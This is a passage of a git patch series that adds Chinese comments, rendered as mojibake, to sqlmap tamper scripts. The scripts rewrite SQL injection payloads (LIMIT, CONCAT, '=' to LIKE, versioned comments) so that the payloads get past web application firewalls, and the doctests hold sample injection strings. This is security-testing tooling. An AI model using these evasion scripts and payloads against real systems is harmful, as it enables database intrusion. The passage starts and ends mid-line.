瀵规湭缂栫爜鐨勫瓧绗﹁繘琛孶nicode杞箟锛屽苟娣诲姞鍒拌繑鍥炲 retVal += '\\u%.4X' % ord(payload[i]) - i += 1 + i += 1 # 绉诲姩绱㈠紩锛屽鐞嗕笅涓涓瓧绗 return retVal From ef5f6eee11b29f232ba5e3951e1fe60266c0ca4a Mon Sep 17 00:00:00 2001 From: sck <2238502556@qq.com> Date: Mon, 30 Dec 2024 10:25:22 +0800 Subject: [PATCH 6/9] sck --- src/sqlmap-master/tamper/commalesslimit.py | 42 +++++++---- src/sqlmap-master/tamper/commalessmid.py | 31 +++++--- .../tamper/commentbeforeparentheses.py | 7 +- src/sqlmap-master/tamper/concat2concatws.py | 32 ++++---- src/sqlmap-master/tamper/decentities.py | 27 +++++-- src/sqlmap-master/tamper/dunion.py | 32 ++++---- src/sqlmap-master/tamper/equaltolike.py | 33 +++++---- src/sqlmap-master/tamper/equaltorlike.py | 29 +++++--- src/sqlmap-master/tamper/escapequotes.py | 18 ++++- src/sqlmap-master/tamper/greatest.py | 37 ++++++---- .../tamper/halfversionedmorekeywords.py | 44 ++++++----- src/sqlmap-master/tamper/hex2char.py | 43 ++++++----- src/sqlmap-master/tamper/hexentities.py | 22 ++++-- src/sqlmap-master/tamper/htmlencode.py | 25 +++++-- src/sqlmap-master/tamper/if2case.py | 73 ++++++++++--------- .../tamper/ifnull2casewhenisnull.py | 36 +++++---- 16 files changed, 329 insertions(+), 202 deletions(-) diff --git a/src/sqlmap-master/tamper/commalesslimit.py b/src/sqlmap-master/tamper/commalesslimit.py index 0561b2f..c5a5799 100644 --- a/src/sqlmap-master/tamper/commalesslimit.py +++ b/src/sqlmap-master/tamper/commalesslimit.py @@ -5,13 +5,14 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import os -import re +import os # 瀵煎叆鎿嶄綔绯荤粺鎺ュ彛妯″潡 +import re # 瀵煎叆姝e垯琛ㄨ揪寮忔ā鍧 -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY +from lib.core.common import singleTimeWarnMessage # 浠庢牳蹇冨簱瀵煎叆鍗曟璀﹀憡娑堟伅鍑芥暟 +from lib.core.enums import DBMS # 浠庢牳蹇冨簱瀵煎叆鏁版嵁搴撶鐞嗙郴缁熸灇涓 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负楂 __priority__ = PRIORITY.HIGH def dependencies(): @@ -19,22 +20,33 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢MySQL涓殑'LIMIT M, N'璇彞鏇挎崲涓哄叾绛夋晥鐨'LIMIT N OFFSET M'褰㈠紡銆 - Requirement: - * MySQL + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - Tested against: - * MySQL 5.0 and 5.5 + 瑕佹眰锛 + * 浠呴傜敤浜嶮ySQL鏁版嵁搴撱 - >>> tamper('LIMIT 2, 3') - 'LIMIT 3 OFFSET 2' + 娴嬭瘯鎯呭喌锛 + * MySQL 5.0 鍜 5.5 + + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃鏌愪簺閽堝'LIMIT M, N'褰㈠紡鐨勯槻寰℃満鍒跺緢鏈夌敤銆 + + 绀轰緥锛 + >>> tamper('LIMIT 2, 3') + 'LIMIT 3 OFFSET 2' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload + + # 浣跨敤姝e垯琛ㄨ揪寮忔煡鎵'LIMIT M, N'褰㈠紡鐨勮鍙 match = re.search(r"(?i)LIMIT\s*(\d+),\s*(\d+)", payload or "") - if match: + if match: # 濡傛灉鎵惧埌鍖归厤椤 + # 鏇挎崲涓'LIMIT N OFFSET M'褰㈠紡 retVal = retVal.replace(match.group(0), "LIMIT %s OFFSET %s" % (match.group(2), match.group(1))) - return retVal + return retVal # 杩斿洖绡℃敼鍚庣殑payload diff --git a/src/sqlmap-master/tamper/commalessmid.py b/src/sqlmap-master/tamper/commalessmid.py index b6f4e7f..d8c368b 100644 --- a/src/sqlmap-master/tamper/commalessmid.py +++ b/src/sqlmap-master/tamper/commalessmid.py @@ -19,26 +19,37 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢MySQL涓殑'MID(A, B, C)'璇彞鏇挎崲涓哄叾绛夋晥鐨'MID(A FROM B FOR C)'褰㈠紡銆 - Requirement: - * MySQL + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - Tested against: - * MySQL 5.0 and 5.5 + 瑕佹眰锛 + * 浠呴傜敤浜嶮ySQL鏁版嵁搴撱 - >>> tamper('MID(VERSION(), 1, 1)') - 'MID(VERSION() FROM 1 FOR 1)' + 娴嬭瘯鎯呭喌锛 + * MySQL 5.0 鍜 5.5 + + 娉ㄦ剰锛 + * 浣跨敤杩欎釜tamper鑴氭湰鏃讹紝浣犲彲鑳介渶瑕佽冭檻浣跨敤'--no-cast'閫夐」锛屼互閬垮厤绫诲瀷杞崲闂銆 + + 绀轰緥锛 + >>> tamper('MID(VERSION(), 1, 1)') + 'MID(VERSION() FROM 1 FOR 1)' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload + # 鏋勫缓璀﹀憡淇℃伅锛屾彁绀虹敤鎴峰彲鑳介渶瑕佷娇鐢'--no-cast'閫夐」 warnMsg = "you should consider usage of switch '--no-cast' along with " warnMsg += "tamper script '%s'" % os.path.basename(__file__).split(".")[0] singleTimeWarnMessage(warnMsg) + # 浣跨敤姝e垯琛ㄨ揪寮忔煡鎵'MID(A, B, C)'褰㈠紡鐨勮鍙 match = re.search(r"(?i)MID\((.+?)\s*,\s*(\d+)\s*\,\s*(\d+)\s*\)", payload or "") - if match: + if match: # 濡傛灉鎵惧埌鍖归厤椤 + # 鏇挎崲涓'MID(A FROM B FOR C)'褰㈠紡 retVal = retVal.replace(match.group(0), "MID(%s FROM %s FOR %s)" % (match.group(1), match.group(2), match.group(3))) - return retVal + return retVal # 杩斿洖绡℃敼鍚庣殑payload diff --git a/src/sqlmap-master/tamper/commentbeforeparentheses.py b/src/sqlmap-master/tamper/commentbeforeparentheses.py index d5e471d..b4d4162 100644 --- a/src/sqlmap-master/tamper/commentbeforeparentheses.py +++ b/src/sqlmap-master/tamper/commentbeforeparentheses.py @@ -5,11 +5,11 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import re +import re # 瀵煎叆姝e垯琛ㄨ揪寮忔ā鍧 from lib.core.enums import PRIORITY -__priority__ = PRIORITY.NORMAL +__priority__ = PRIORITY.NORMAL # 璁剧疆浼樺厛绾т负鏅 def dependencies(): pass @@ -32,9 +32,10 @@ def tamper(payload, **kwargs): 'SELECT ABS/**/(1)' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忔煡鎵惧崟璇嶅悗绱ц窡'('鐨勬ā寮忥紝骞跺湪'('鍓嶆坊鍔犲唴鑱旀敞閲'/**/' retVal = re.sub(r"\b(\w+)\(", r"\g<1>/**/(", retVal) return retVal diff --git a/src/sqlmap-master/tamper/concat2concatws.py b/src/sqlmap-master/tamper/concat2concatws.py index 7c66c88..3fbc8d6 100644 --- a/src/sqlmap-master/tamper/concat2concatws.py +++ b/src/sqlmap-master/tamper/concat2concatws.py @@ -5,12 +5,13 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import os +import os # 瀵煎叆鎿嶄綔绯荤粺妯″潡锛岀敤浜庤幏鍙栨枃浠惰矾寰勭瓑淇℃伅 -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY +from lib.core.common import singleTimeWarnMessage # 浠庢牳蹇冨簱瀵煎叆鍗曟璀﹀憡娑堟伅鍑芥暟 +from lib.core.enums import DBMS # 浠庢牳蹇冨簱瀵煎叆鏁版嵁搴撶鐞嗙郴缁熸灇涓 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏈楂 __priority__ = PRIORITY.HIGHEST def dependencies(): @@ -18,23 +19,28 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢MySQL涓殑'CONCAT(A, B)'鍑芥暟鏇挎崲涓哄叾绛夋晥鐨'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'褰㈠紡銆 - Requirement: - * MySQL + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - Tested against: + 瑕佹眰锛 + * 浠呴傜敤浜嶮ySQL鏁版嵁搴撱 + + 娴嬭瘯鎯呭喌锛 * MySQL 5.0 - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that filter the CONCAT() function + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃閭d簺杩囨护CONCAT()鍑芥暟鐨勯潪甯稿急鐨勫畾鍒禬eb搴旂敤闃茬伀澧欏緢鏈夌敤銆 - >>> tamper('CONCAT(1,2)') - 'CONCAT_WS(MID(CHAR(0),0,0),1,2)' + 绀轰緥锛 + >>> tamper('CONCAT(1,2)') + 'CONCAT_WS(MID(CHAR(0),0,0),1,2)' """ if payload: + # 灏唒ayload涓殑'CONCAT('鏇挎崲涓'CONCAT_WS(MID(CHAR(0),0,0),' payload = payload.replace("CONCAT(", "CONCAT_WS(MID(CHAR(0),0,0),") return payload diff --git a/src/sqlmap-master/tamper/decentities.py b/src/sqlmap-master/tamper/decentities.py index aaed22f..7457579 100644 --- a/src/sqlmap-master/tamper/decentities.py +++ b/src/sqlmap-master/tamper/decentities.py @@ -5,8 +5,9 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负浣 __priority__ = PRIORITY.LOW def dependencies(): @@ -14,19 +15,29 @@ def dependencies(): def tamper(payload, **kwargs): """ - HTML encode in decimal (using code points) all characters (e.g. ' -> ') + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鎵鏈夊瓧绗﹁浆鎹负HTML瀹炰綋锛堜娇鐢ㄥ崄杩涘埗浠g爜鐐癸級銆 - >>> tamper("1' AND SLEEP(5)#") - '1' AND SLEEP(5)#' + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + - 閬嶅巻payload涓殑姣忎釜瀛楃锛屽苟灏嗘瘡涓瓧绗﹁浆鎹负鍏跺搴旂殑HTML瀹炰綋褰㈠紡锛堜緥濡傦紝' -> '锛夈 + + 绀轰緥锛 + >>> tamper("1' AND SLEEP(5)#") + '1' AND SLEEP(5)#' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload - if payload: - retVal = "" - i = 0 + if payload: # 濡傛灉payload涓嶄负绌 + retVal = "" # 鍒濆鍖栬繑鍥炲煎瓧绗︿覆 + i = 0 # 鍒濆鍖栫储寮 + # 閬嶅巻payload涓殑姣忎釜瀛楃 while i < len(payload): + # 灏嗗綋鍓嶅瓧绗﹁浆鎹负鍏跺搴旂殑HTML瀹炰綋褰㈠紡锛屽苟娣诲姞鍒拌繑鍥炲煎瓧绗︿覆 retVal += "&#%s;" % ord(payload[i]) i += 1 diff --git a/src/sqlmap-master/tamper/dunion.py b/src/sqlmap-master/tamper/dunion.py index 2717268..58a4607 100644 --- a/src/sqlmap-master/tamper/dunion.py +++ b/src/sqlmap-master/tamper/dunion.py @@ -5,13 +5,14 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import os -import re +import os # 瀵煎叆鎿嶄綔绯荤粺妯″潡锛岀敤浜庤幏鍙栨枃浠惰矾寰勭瓑淇℃伅 +import re # 瀵煎叆姝e垯琛ㄨ揪寮忔ā鍧 -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY +from lib.core.common import singleTimeWarnMessage # 浠庢牳蹇冨簱瀵煎叆鍗曟璀﹀憡娑堟伅鍑芥暟 +from lib.core.enums import DBMS # 浠庢牳蹇冨簱瀵煎叆鏁版嵁搴撶鐞嗙郴缁熸灇涓 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏈楂 __priority__ = PRIORITY.HIGHEST def dependencies(): @@ -19,16 +20,21 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances of UNION with DUNION + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鍏朵腑鐨'UNION'鍏抽敭瀛楁浛鎹负'DUNION'銆 - Requirement: - * Oracle + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - Notes: - * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf + 瑕佹眰锛 + * 浠呴傜敤浜嶰racle鏁版嵁搴撱 - >>> tamper('1 UNION ALL SELECT') - '1DUNION ALL SELECT' - """ + 娉ㄦ剰锛 + * 鍙傝冩枃妗o細https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf + 绀轰緥锛 + >>> tamper('1 UNION ALL SELECT') + '1DUNION ALL SELECT' + """ + # 濡傛灉payload涓嶄负绌猴紝浣跨敤姝e垯琛ㄨ揪寮忔浛鎹㈠叾涓殑UNION鍏抽敭瀛 return re.sub(r"(?i)(\d+)\s+(UNION )", r"\g<1>D\g<2>", payload) if payload else payload diff --git a/src/sqlmap-master/tamper/equaltolike.py b/src/sqlmap-master/tamper/equaltolike.py index ddc237b..6f77ef4 100644 --- a/src/sqlmap-master/tamper/equaltolike.py +++ b/src/sqlmap-master/tamper/equaltolike.py @@ -7,8 +7,9 @@ See the file 'LICENSE' for copying permission import re -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏈楂 __priority__ = PRIORITY.HIGHEST def dependencies(): @@ -16,25 +17,29 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鎵鏈夌殑绛夊彿锛'='锛夋搷浣滅鏇挎崲涓'LIKE'鎿嶄綔绗︺ - Tested against: + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 娴嬭瘯鎯呭喌锛 * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 + * MySQL 4, 5.0 鍜 5.5 - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the equal character ('=') - * The LIKE operator is SQL standard. Hence, this tamper script - should work against all (?) databases + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃閭d簺杩囨护绛夊彿锛'='锛夊瓧绗︾殑寮盬eb搴旂敤闃茬伀澧欏緢鏈夌敤銆 + * LIKE鎿嶄綔绗︽槸SQL鏍囧噯鎿嶄綔绗︼紝鍥犳杩欎釜tamper鑴氭湰搴旇閫傜敤浜庢墍鏈夋暟鎹簱銆 - >>> tamper('SELECT * FROM users WHERE id=1') - 'SELECT * FROM users WHERE id LIKE 1' + 绀轰緥锛 + >>> tamper('SELECT * FROM users WHERE id=1') + 'SELECT * FROM users WHERE id LIKE 1' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload + - if payload: - retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) + if payload: # 濡傛灉payload涓嶄负绌 + retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) # 浣跨敤姝e垯琛ㄨ揪寮忔浛鎹ayload涓殑绛夊彿锛'='锛変负'LIKE' return retVal diff --git a/src/sqlmap-master/tamper/equaltorlike.py b/src/sqlmap-master/tamper/equaltorlike.py index 097adfc..3e8efb8 100644 --- a/src/sqlmap-master/tamper/equaltorlike.py +++ b/src/sqlmap-master/tamper/equaltorlike.py @@ -7,8 +7,9 @@ See the file 'LICENSE' for copying permission import re -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏈楂 __priority__ = PRIORITY.HIGHEST def dependencies(): @@ -16,22 +17,30 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces all occurrences of operator equal ('=') with 'RLIKE' counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鎵鏈夌殑绛夊彿锛'='锛夋搷浣滅鏇挎崲涓'RLIKE'鎿嶄綔绗︺ - Tested against: - * MySQL 4, 5.0 and 5.5 + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the equal character ('=') + 娴嬭瘯鎯呭喌锛 + * MySQL 4, 5.0 鍜 5.5 - >>> tamper('SELECT * FROM users WHERE id=1') - 'SELECT * FROM users WHERE id RLIKE 1' + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃閭d簺杩囨护绛夊彿锛'='锛夊瓧绗︾殑寮盬eb搴旂敤闃茬伀澧欏緢鏈夌敤銆 + + 绀轰緥锛 + >>> tamper('SELECT * FROM users WHERE id=1') + 'SELECT * FROM users WHERE id RLIKE 1' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忔浛鎹ayload涓殑绛夊彿锛'='锛変负'RLIKE' + # \s* 鍖归厤浠绘剰鏁伴噺鐨勭┖鐧藉瓧绗︼紙鍖呮嫭0涓級 + # = 鍖归厤绛夊彿瀛楃 + # \s* 鍖归厤绛夊彿鍚庣殑浠绘剰鏁伴噺鐨勭┖鐧藉瓧绗 retVal = re.sub(r"\s*=\s*", " RLIKE ", retVal) return retVal diff --git a/src/sqlmap-master/tamper/escapequotes.py b/src/sqlmap-master/tamper/escapequotes.py index 778b693..f29e8e7 100644 --- a/src/sqlmap-master/tamper/escapequotes.py +++ b/src/sqlmap-master/tamper/escapequotes.py @@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission from lib.core.enums import PRIORITY +# 璁剧疆浼樺厛绾т负鏅 __priority__ = PRIORITY.NORMAL def dependencies(): @@ -14,10 +15,19 @@ def dependencies(): def tamper(payload, **kwargs): """ - Slash escape single and double quotes (e.g. ' -> \') + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛岄氳繃鏂滄潬杞箟鍗曞紩鍙峰拰鍙屽紩鍙枫 - >>> tamper('1" AND SLEEP(5)#') - '1\\\\" AND SLEEP(5)#' - """ + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + - 灏唒ayload涓殑鍗曞紩鍙凤紙'锛夋浛鎹负杞箟褰㈠紡锛圽\'锛夈 + - 灏唒ayload涓殑鍙屽紩鍙凤紙"锛夋浛鎹负杞箟褰㈠紡锛圽\"锛夈 + 绀轰緥锛 + >>> tamper('1" AND SLEEP(5)#') + '1\\\\" AND SLEEP(5)#' + """ + # 鏇挎崲payload涓殑鍗曞紩鍙峰拰鍙屽紩鍙蜂负瀹冧滑鐨勮浆涔夊舰寮 return payload.replace("'", "\\'").replace('"', '\\"') diff --git a/src/sqlmap-master/tamper/greatest.py b/src/sqlmap-master/tamper/greatest.py index 5801355..cb9a15b 100644 --- a/src/sqlmap-master/tamper/greatest.py +++ b/src/sqlmap-master/tamper/greatest.py @@ -7,8 +7,9 @@ See the file 'LICENSE' for copying permission import re -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏈楂 __priority__ = PRIORITY.HIGHEST def dependencies(): @@ -16,30 +17,36 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces greater than operator ('>') with 'GREATEST' counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢澶т簬鎿嶄綔绗︼紙'>')鏇挎崲涓'GREATEST'鍑芥暟鐨勭瓑鏁堝舰寮忋 - Tested against: - * MySQL 4, 5.0 and 5.5 + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 娴嬭瘯鎯呭喌锛 + * MySQL 4, 5.0 鍜 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the greater than character - * The GREATEST clause is a widespread SQL command. Hence, this - tamper script should work against majority of databases + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃閭d簺杩囨护澶т簬瀛楃锛'>')鐨勫急Web搴旂敤闃茬伀澧欏緢鏈夌敤銆 + * GREATEST鍑芥暟鏄竴涓箍娉涗娇鐢ㄧ殑SQL鍛戒护銆傚洜姝わ紝杩欎釜tamper鑴氭湰搴旇閫傜敤浜庡ぇ澶氭暟鏁版嵁搴撱 - >>> tamper('1 AND A > B') - '1 AND GREATEST(A,B+1)=A' + 绀轰緥锛 + >>> tamper('1 AND A > B') + '1 AND GREATEST(A,B+1)=A' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload + - if payload: + if payload: # 濡傛灉payload涓嶄负绌 + # 浣跨敤姝e垯琛ㄨ揪寮忔煡鎵'A > B'褰㈠紡鐨勮鍙 match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload) - if match: + if match: # 濡傛灉鎵惧埌鍖归厤椤 + # 鏋勯燝REATEST鍑芥暟褰㈠紡鐨勮鍙ワ紝骞舵浛鎹㈠師璇彞 _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(3), match.group(4), match.group(3)) - retVal = retVal.replace(match.group(0), _) + retVal = retVal.replace(match.group(0), _) # 鏇挎崲鍘熻鍙ヤ负GREATEST鍑芥暟褰㈠紡 return retVal diff --git a/src/sqlmap-master/tamper/halfversionedmorekeywords.py b/src/sqlmap-master/tamper/halfversionedmorekeywords.py index f4dd455..f922076 100644 --- a/src/sqlmap-master/tamper/halfversionedmorekeywords.py +++ b/src/sqlmap-master/tamper/halfversionedmorekeywords.py @@ -8,12 +8,13 @@ See the file 'LICENSE' for copying permission import os import re -from lib.core.common import singleTimeWarnMessage -from lib.core.data import kb -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY -from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS +from lib.core.common import singleTimeWarnMessage # 浠庢牳蹇冨簱瀵煎叆鍗曟璀﹀憡娑堟伅鍑芥暟 +from lib.core.data import kb # 浠庢牳蹇冨簱瀵煎叆鐭ヨ瘑搴擄紝鍖呭惈SQL鍏抽敭瀛楃瓑淇℃伅 +from lib.core.enums import DBMS # 浠庢牳蹇冨簱瀵煎叆鏁版嵁搴撶鐞嗙郴缁熸灇涓 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS # 浠庢牳蹇冭缃鍏ュ拷鐣ョ┖鏍煎奖鍝嶇殑鍏抽敭瀛楀垪琛 +# 璁剧疆浼樺厛绾т负杈冮珮 __priority__ = PRIORITY.HIGHER def dependencies(): @@ -21,35 +22,44 @@ def dependencies(): def tamper(payload, **kwargs): """ - Adds (MySQL) versioned comment before each keyword + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛岄氳繃鍦ㄦ瘡涓叧閿瓧鍓嶆坊鍔燤ySQL鐗堟湰娉ㄩ噴銆 - Requirement: - * MySQL < 5.1 + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - Tested against: + 瑕佹眰锛 + * 浠呴傜敤浜嶮ySQL鐗堟湰灏忎簬5.1鐨勬暟鎹簱銆 + + 娴嬭瘯鎯呭喌锛 * MySQL 4.0.18, 5.0.22 - Notes: - * Useful to bypass several web application firewalls when the - back-end database management system is MySQL - * Used during the ModSecurity SQL injection challenge, - http://modsecurity.org/demo/challenge.html + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃Web搴旂敤闃茬伀澧欏緢鏈夌敤锛岀壒鍒槸褰撳悗绔暟鎹簱绠$悊绯荤粺鏄疢ySQL鏃躲 + * 鍦∕odSecurity SQL娉ㄥ叆鎸戞垬涓娇鐢ㄨ繃锛岄摼鎺ワ細http://modsecurity.org/demo/challenge.html - >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") - "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa" + 绀轰緥锛 + >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") + "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa" """ def process(match): + """ + 杈呭姪鍑芥暟锛岀敤浜庡鐞嗘鍒欏尮閰嶇殑缁撴灉銆 + 灏嗗尮閰嶅埌鐨勫叧閿瓧鏇挎崲涓哄甫鏈夌増鏈敞閲婄殑鍏抽敭瀛椼 + """ word = match.group('word') if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: return match.group().replace(word, "/*!0%s" % word) else: return match.group() - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忔煡鎵惧苟鏇挎崲鍏抽敭瀛 retVal = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=\W|\Z)", process, retVal) + # 鏇挎崲澶氫綑鐨勭┖鏍 retVal = retVal.replace(" /*!0", "/*!0") return retVal diff --git a/src/sqlmap-master/tamper/hex2char.py b/src/sqlmap-master/tamper/hex2char.py index 267124d..fafc134 100644 --- a/src/sqlmap-master/tamper/hex2char.py +++ b/src/sqlmap-master/tamper/hex2char.py @@ -9,11 +9,12 @@ import os import re from lib.core.common import singleTimeWarnMessage -from lib.core.convert import 